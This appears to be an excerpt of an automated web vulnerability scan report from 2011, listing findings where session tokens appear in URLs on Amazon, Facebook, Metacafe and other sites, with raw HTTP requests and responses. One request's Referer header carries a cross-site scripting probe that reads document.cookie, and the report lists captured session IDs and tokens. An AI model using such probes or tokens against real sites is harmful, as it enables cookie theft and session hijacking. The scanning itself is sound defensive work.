http://www.amazon.com/gp/voting/cast/Reviews/2115/R1Y1OWU5QLKEDW/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=3E90852F7C987E7C7C3E29BC2509EEF654E678BB&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDU5NjgwNDk0Ni9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZ0YWc9c2V2ZXJkaWEtMjAmbGlua0NvZGU9YXMyJmNhbXA9MTc4OSZpc1NSQWRtaW49JmNyZWF0aXZlPTM5MDk1NyZjcmVhdGl2ZUFTSU49MDU5NjgwNDk0Ng&voteAnchorName=R1Y1OWU5QLKEDW.2115.Inappropriate.Reviews&voteSessionID=177-3345764-3077262
http://www.amazon.com/gp/voting/cast/Reviews/2115/R25FEN55WP7HQC/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=25451DA5C23F5B316D3A335FB3C804869B4E0FFA&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDU5NjgwNDk0Ni9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZ0YWc9c2V2ZXJkaWEtMjAmbGlua0NvZGU9YXMyJmNhbXA9MTc4OSZpc1NSQWRtaW49JmNyZWF0aXZlPTM5MDk1NyZjcmVhdGl2ZUFTSU49MDU5NjgwNDk0Ng&voteAnchorName=R25FEN55WP7HQC.2115.Helpful.Reviews&voteSessionID=177-3345764-3077262
http://www.amazon.com/gp/voting/cast/Reviews/2115/R25FEN55WP7HQC/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=EE94A791FB5FB132C3B5C33888C786B38F0F1FC8&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDU5NjgwNDk0Ni9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZ0YWc9c2V2ZXJkaWEtMjAmbGlua0NvZGU9YXMyJmNhbXA9MTc4OSZpc1NSQWRtaW49JmNyZWF0aXZlPTM5MDk1NyZjcmVhdGl2ZUFTSU49MDU5NjgwNDk0Ng&voteAnchorName=R25FEN55WP7HQC.2115.Helpful.Reviews&voteSessionID=177-3345764-3077262
http://www.amazon.com/gp/voting/cast/Reviews/2115/R25FEN55WP7HQC/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=FB92B3DE8E4F4F18F8BE9C3CA93BF9BA79E68E49&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDU5NjgwNDk0Ni9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZ0YWc9c2V2ZXJkaWEtMjAmbGlua0NvZGU9YXMyJmNhbXA9MTc4OSZpc1NSQWRtaW49JmNyZWF0aXZlPTM5MDk1NyZjcmVhdGl2ZUFTSU49MDU5NjgwNDk0Ng&voteAnchorName=R25FEN55WP7HQC.2115.Inappropriate.Reviews&voteSessionID=177-3345764-3077262
http://www.amazon.com/gp/voting/cast/Reviews/2115/R2IK5YS84M0HC7/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=5F3E7F5CFA2EC2F433A2208CF1964F269FCC5A2A&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDU5NjgwNDk0Ni9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZ0YWc9c2V2ZXJkaWEtMjAmbGlua0NvZGU9YXMyJmNhbXA9MTc4OSZpc1NSQWRtaW49JmNyZWF0aXZlPTM5MDk1NyZjcmVhdGl2ZUFTSU49MDU5NjgwNDk0Ng&voteAnchorName=R2IK5YS84M0HC7.2115.Helpful.Reviews&voteSessionID=177-3345764-3077262
http://www.amazon.com/gp/voting/cast/Reviews/2115/R2IK5YS84M0HC7/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=6607021FC2D22DB19BB0449250695412ABC6A9B2&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDU5NjgwNDk0Ni9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZ0YWc9c2V2ZXJkaWEtMjAmbGlua0NvZGU9YXMyJmNhbXA9MTc4OSZpc1NSQWRtaW49JmNyZWF0aXZlPTM5MDk1NyZjcmVhdGl2ZUFTSU49MDU5NjgwNDk0Ng&voteAnchorName=R2IK5YS84M0HC7.2115.Helpful.Reviews&voteSessionID=177-3345764-3077262
http://www.amazon.com/gp/voting/cast/Reviews/2115/R2IK5YS84M0HC7/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=406953D9E36D6667D076AC42AC86C19631D97900&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDU5NjgwNDk0Ni9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZ0YWc9c2V2ZXJkaWEtMjAmbGlua0NvZGU9YXMyJmNhbXA9MTc4OSZpc1NSQWRtaW49JmNyZWF0aXZlPTM5MDk1NyZjcmVhdGl2ZUFTSU49MDU5NjgwNDk0Ng&voteAnchorName=R2IK5YS84M0HC7.2115.Inappropriate.Reviews&voteSessionID=177-3345764-3077262

Request

GET /gp/product/0596804946?ie=UTF8&tag=severdia-20&linkCode=as2&camp=1789&creative=390957&creativeASIN=0596804946 HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

9.76. http://www.amazon.com/gp/site-directory/x22 previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.amazon.com
Path:	/gp/site-directory/x22

Issue detail

The response contains the following links that appear to contain session tokens:

http://www.amazon.com/gp/redirect.html/192-0833084-3663062?_encoding=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fproduct-ads-on-amazon.htm%3Fld%3DAZPADSFooter&token=1E60AB4AC0ECCA00151B45353E21782E539DC601
http://www.amazon.com/gp/redirect.html/192-0833084-3663062?_encoding=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fsell-on-amazon.htm%3Fld%3DAZFSSOA&token=1E60AB4AC0ECCA00151B45353E21782E539DC601
http://www.amazon.com/gp/redirect.html/ref=gw_m_b_ir/192-0833084-3663062?_encoding=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-irhome%26c%3D97664&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C
http://www.amazon.com/gp/redirect.html/ref=gw_m_b_pr/192-0833084-3663062?_encoding=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-mediaHome%26c%3D176060&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C
http://www.amazon.com/gp/redirect.html/ref=sd_allcat/192-0833084-3663062?_encoding=UTF8&location=http%3A%2F%2Fwebstore.amazon.com%2F%3Fld%3DAZNav&token=745025A57E00B24318BA2181B3B753FC6B2F166D
http://www.amazon.com/gp/redirect.html/ref=sd_allcat/192-0833084-3663062?_encoding=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2FproductAds%2Findex.html%3Fld%3DAZPadsNav&token=1E60AB4AC0ECCA00151B45353E21782E539DC601
http://www.amazon.com/gp/redirect.html/ref=sd_allcat_adv/192-0833084-3663062?location=http://advantage.amazon.com/gp/vendor/public/join&token=8A42249D1B51779DE51C03226E939CB7EF5FF354
http://www.amazon.com/gp/redirect.html/ref=sd_allcat_dtp/192-0833084-3663062?location=http://dtp.amazon.com/&token=ED7546842AF86000862C6B4CDB683D114A0EDF07
https://www.amazon.com/gp/redirect.html/ref=sd_allcat_amzpmtdls/192-0833084-3663062?_encoding=UTF8&location=https%3A%2F%2Fpayments.amazon.com%2Fsdui%2Fsdui%2Fpersonal%2Fdeals%3Fapaysccid%3Damzn-allstores&token=32045C225BB802284AADB840CB3223F0668A29BF

Request

GET /gp/site-directory/x22 HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:03:29 GMT
Server: Server
x-amz-id-1: 040X2S941YQ8YM9GDF3Y
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: sl07PFCJKDLvXHwNIxyGk0Yh+o6P2TnOLpehS7jphg0PPwo4AItme2BkehKpR0Nz
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=192-0833084-3663062; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 106589

<html>
<head>

<style type="text/css"><!--

BODY { font-family: verdana,arial,helvetica,sans-serif; font-size: x-small; background-color: #FFFFFF; color: #000000; margin-
...[SNIP]...
</a>, <a href="https://www.amazon.com:443/gp/redirect.html/ref=sd_allcat_amzpmtdls/192-0833084-3663062?_encoding=UTF8&location=https%3A%2F%2Fpayments.amazon.com%2Fsdui%2Fsdui%2Fpersonal%2Fdeals%3Fapaysccid%3Damzn-allstores&token=32045C225BB802284AADB840CB3223F0668A29BF">Amazon Payments Deals</a>
...[SNIP]...
</span>
<a href="/gp/redirect.html/ref=sd_allcat_adv/192-0833084-3663062?location=http://advantage.amazon.com/gp/vendor/public/join&token=8A42249D1B51779DE51C03226E939CB7EF5FF354">Advantage</a>
...[SNIP]...
</a>, <a href="/gp/redirect.html/ref=sd_allcat/192-0833084-3663062?_encoding=UTF8&location=http%3A%2F%2Fwebstore.amazon.com%2F%3Fld%3DAZNav&token=745025A57E00B24318BA2181B3B753FC6B2F166D">WebStore by Amazon</a>, <a href="/gp/redirect.html/ref=sd_allcat_dtp/192-0833084-3663062?location=http://dtp.amazon.com/&token=ED7546842AF86000862C6B4CDB683D114A0EDF07">Digital Text Platform</a>, <a href="/gp/redirect.html/ref=sd_allcat/192-0833084-3663062?_encoding=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2FproductAds%2Findex.html%3Fld%3DAZPadsNav&token=1E60AB4AC0ECCA00151B45353E21782E539DC601">Product Ads</a>
...[SNIP]...
<li><a href="/gp/redirect.html/ref=gw_m_b_ir/192-0833084-3663062?_encoding=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-irhome%26c%3D97664&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C">Investor Relations</a>
...[SNIP]...
<li><a href="/gp/redirect.html/ref=gw_m_b_pr/192-0833084-3663062?_encoding=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-mediaHome%26c%3D176060&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C">Press Releases</a>
...[SNIP]...
<li><a href="/gp/redirect.html/192-0833084-3663062?_encoding=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fsell-on-amazon.htm%3Fld%3DAZFSSOA&token=1E60AB4AC0ECCA00151B45353E21782E539DC601">Sell on Amazon</a>
...[SNIP]...
<li><a href="/gp/redirect.html/192-0833084-3663062?_encoding=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fproduct-ads-on-amazon.htm%3Fld%3DAZPADSFooter&token=1E60AB4AC0ECCA00151B45353E21782E539DC601">Advertise Your Products</a>
...[SNIP]...

9.77. http://www.apture.com/js/apture.js previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.apture.com
Path:	/js/apture.js

Issue detail

The URL in the request appears to contain a session token within the query string:

http://www.apture.com/js/apture.js?siteToken=5rLcDWk

Request

GET /js/apture.js?siteToken=5rLcDWk HTTP/1.1
Host: www.apture.com
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Expires: Mon, 24 Jan 2011 21:11:11 GMT
Last-Modified: Mon, 24 Jan 2011 21:11:11 GMT
Etag: "4ad7d91e6131ca80d32f15ef4593339c"
Cache-Control: max-age=0
P3p: CP="NON CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa HISa OUR LEG UNI COM NAV INT"
Content-Type: text/javascript
Set-Cookie: AC=nbrlsqWMpk; Domain=.apture.com; expires=Sun, 17-Jan-2037 19:14:07 GMT; Path=/
Content-Length: 1604
Date: Mon, 24 Jan 2011 21:11:11 GMT
Connection: close

(function(){
var B=window.apture,A=window.apture=B||{};
if(!A.isApp){
A.prefs={};A.referer="http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5
...[SNIP]...

9.78. http://www.dzone.com/links/add.html previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.dzone.com
Path:	/links/add.html

Issue detail

The response contains the following links that appear to contain session tokens:

http://www.dzone.com/links/login.html;jsessionid=aaaH3fDCwPO6Ah760t92s

Request

GET /links/add.html?url={u}&title={t} HTTP/1.1
Host: www.dzone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 13:14:07 GMT
Server: Apache/2.2.11 (Unix) DAV/2 SVN/1.5.5 Resin/4.0.4 PHP/5.2.13
Cache-Control: private, max-age=1
Location: http://www.dzone.com/links/login.html;jsessionid=aaaH3fDCwPO6Ah760t92s
Content-Length: 108
Set-Cookie: JSESSIONID=aaaH3fDCwPO6Ah760t92s; path=/
Content-Type: text/html; charset=utf-8
Expires: Tue, 25 Jan 2011 13:14:08 GMT
Vary: Accept-Encoding,User-Agent
Connection: close

The URL has moved <a href="http://www.dzone.com/links/login.html;jsessionid=aaaH3fDCwPO6Ah760t92s">here</a>

9.79. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The URL in the request appears to contain a session token within the query string:

http://www.facebook.com/extern/login_status.php?api_key=131775306867765&app_id=131775306867765&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23cb%3Df3ee735f9c%26origin%3Dhttp%253A%252F%252Fcommunity.joomla.org%252Ff3e449cbc%26relation%3Dopener%26transport%3Dpostmessage%26frame%3Df41cbdf34%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23cb%3Df39e2b2a64%26origin%3Dhttp%253A%252F%252Fcommunity.joomla.org%252Ff3e449cbc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df41cbdf34&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23cb%3Df28381e04%26origin%3Dhttp%253A%252F%252Fcommunity.joomla.org%252Ff3e449cbc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df41cbdf34&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23cb%3Df1f9f09a34%26origin%3Dhttp%253A%252F%252Fcommunity.joomla.org%252Ff3e449cbc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df41cbdf34&sdk=joey&session_version=3

Request

GET /extern/login_status.php?api_key=131775306867765&app_id=131775306867765&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23cb%3Df3ee735f9c%26origin%3Dhttp%253A%252F%252Fcommunity.joomla.org%252Ff3e449cbc%26relation%3Dopener%26transport%3Dpostmessage%26frame%3Df41cbdf34%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23cb%3Df39e2b2a64%26origin%3Dhttp%253A%252F%252Fcommunity.joomla.org%252Ff3e449cbc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df41cbdf34&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23cb%3Df28381e04%26origin%3Dhttp%253A%252F%252Fcommunity.joomla.org%252Ff3e449cbc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df41cbdf34&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23cb%3Df1f9f09a34%26origin%3Dhttp%253A%252F%252Fcommunity.joomla.org%252Ff3e449cbc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df41cbdf34&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://community.joomla.org/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dla2day.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fwww.la2day.com%252F%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php#cb=f28381e04&origin=http%3A%2F%2Fcommunity.joomla.org%2Ff3e449cbc&relation=parent&transport=postmessage&frame=f41cbdf34
Content-Type: text/html; charset=utf-8
X-Cnection: close
Date: Mon, 24 Jan 2011 02:20:43 GMT
Content-Length: 0

9.80. http://www.metacafe.com/fplayer/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.metacafe.com
Path:	/fplayer/

Issue detail

The response contains the following links that appear to contain session tokens:

https://secure.metacafe.com/account/login/?token=bfa4589eaa47094016e477c9239ce87c
https://secure.metacafe.com/account/login/?token=bfa4589eaa47094016e477c9239ce87c&action=login
https://secure.metacafe.com/account/login/?token=bfa4589eaa47094016e477c9239ce87c&action=register

Request

GET /fplayer/ HTTP/1.1
Host: www.metacafe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI CUR ADM OUR NOR STA NID"
Content-Type: text/html
Date: Tue, 25 Jan 2011 04:45:05 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=37405ae87945ce0d058ea5e18b5a73df; path=/; domain=.metacafe.com
Set-Cookie: OAGEO=US%7CTX%7CDallas%7C75207%7C32.7825%7C-96.8207%7C623%7C214%7C%7C%7C; path=/; domain=.metacafe.com
Set-Cookie: OAID=f488ed4f4e9ec6a273b4b088e853dd33; expires=Wed, 25-Jan-2012 04:45:05 GMT; path=/; domain=.metacafe.com
Set-Cookie: User=%7B%22sc%22%3A1%2C%22visitID%22%3A%225ff37793909b485fc44ca3c3af4425f7%22%2C%22LEID%22%3A15%2C%22LangID%22%3A%22en%22%2C%22npUserLocations%22%3A%5B244%5D%2C%22npUserLanguages%22%3A%5B9%5D%2C%22pve%22%3A1%7D; expires=Sun, 24-Jan-2016 04:45:05 GMT; path=/; domain=.metacafe.com
Set-Cookie: dsavip=3400536236.20480.0000; expires=Tue, 25-Jan-2011 05:45:05 GMT; path=/
Content-Length: 160213

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
<li class="Account" id="Register"><a href="https://secure.metacafe.com/account/login/?token=bfa4589eaa47094016e477c9239ce87c&action=register" rel="nofollow" title="Register">Register</a>
...[SNIP]...
<li class="Account" id="SignIn"><a href="https://secure.metacafe.com/account/login/?token=bfa4589eaa47094016e477c9239ce87c&action=login" rel="nofollow" title="Sign In">Sign In</a>
...[SNIP]...
<li class="report" id="Submit"><a href="https://secure.metacafe.com/account/login/?token=bfa4589eaa47094016e477c9239ce87c&action=login" title="" tabindex="7">Upload</a>
...[SNIP]...
<li><a href="https://secure.metacafe.com/account/login/?token=bfa4589eaa47094016e477c9239ce87c" title="Your Channel">My Channel</a>
...[SNIP]...
<li><a href="https://secure.metacafe.com/account/login/?token=bfa4589eaa47094016e477c9239ce87c" title="Subscriptions">Subscriptions</a>
...[SNIP]...
<li><a href="https://secure.metacafe.com/account/login/?token=bfa4589eaa47094016e477c9239ce87c" title="Favorites">Favorites</a>
...[SNIP]...
<li><a id="CountryFlag" href="https://secure.metacafe.com/account/login/?token=bfa4589eaa47094016e477c9239ce87c">Location: <img src="http://s.mcstatic.com/Images/flags/us.gif" alt="US" />
...[SNIP]...

9.81. http://www.mindbodygreen.com/passvote.action previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.mindbodygreen.com
Path:	/passvote.action

Issue detail

The response contains the following links that appear to contain session tokens:

http://www.mindbodygreen.com/0-1024/Q-A-with-Kris-Carr-Crazy-Sexy-Inspirational-Wellness-Rock-Star.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/0-1115/The-3-Ps-of-Optimism.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/0-1446/The-Power-The-Secret-Sequel-24-Inspirational-Quotes-from-Rhonda-Byrnes-New-Book.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/0-1452/Barre3-Review-Better-Workout-for-Better-Posture.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/0-1500/Men-and-Yoga-What-Inspired-Yogis-to-Hit-the-Mat.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/0-1530/Q-A-with-Seane-Corn-On-Yoga-Giving-Back.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/0-1683/6-Ways-to-Detox-Through-Your-Skin.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/0-1792/8-Steps-to-Finding-Your-Middle-Path-for-the-New-Year-Extremes-Begone.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/0-1835/Breathe-Your-Way-to-an-Open-Heart.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/0-787/Q-A-with-Melissa-Etheridge-On-Yoga-Books-More.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/0-91/The-7-Chakras-for-Beginners.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/0-947/Yoga-Poses-for-the-Core-Howto-Tips-Benefits-Images-Videos.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/Beginners-Guides;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/Culture/;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/Fitness/;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/Food/;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/Home/;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/Personal-Growth/;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/QandA;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/Spirituality/;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/Wellness/;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/Yoga-Pilates/;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/about.jsp;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/contactus.jsp;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/contactus.jsp;jsessionid=411392370C2802E8CD928A39CCA58AA0?t=help
http://www.mindbodygreen.com/css/featurepreviews.css;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/css/main.css;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/css/wc.css;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/disclaimer.jsp;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/favicon.ico;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/images/features/barre-3-review-preview.jpg;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/images/features/heart-chakra.jpg;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/images/features/preface-banner_melissa_preview.jpg;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/images/features/thumbs/7-chakras-beginners.jpg;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/images/features/thumbs/Jess-Ainscough-wellness-thumb.jpg;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/images/features/thumbs/KrisCarr1-thumb.jpg;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/images/features/thumbs/McLeanMcGown_thumb.jpg;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/images/features/thumbs/Vinnie-THUMB.jpg;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/images/features/thumbs/brian-johnson-wellness-thumb.jpg;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/images/features/thumbs/seane-corn-art-shot-thumb.jpg;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/images/features/thumbs/the-power-rhonda-byrne-the-secret-thumb.jpg;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/images/features/thumbs/yoga-poses-core-preview-9-ways-lose-weight-thumb.jpg;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/images/itunes-logo.jpg;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/images/logo_symbols.gif;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/images/logo_text.gif;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/images/nav_separator.gif;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/images/ny-banner-300x250.jpg;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/images/tagline.png;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/images/travel-banner-300x250.jpg;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/images/youtube-logo.jpg;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/js/swfobject.js;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/privacy.jsp;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/rss/feed.xml;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/tag/PETA.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/tag/TED.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/tag/abs.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/tag/alice-waters.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/tag/alicia-silverstone.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/tag/apps.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/tag/beauty.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
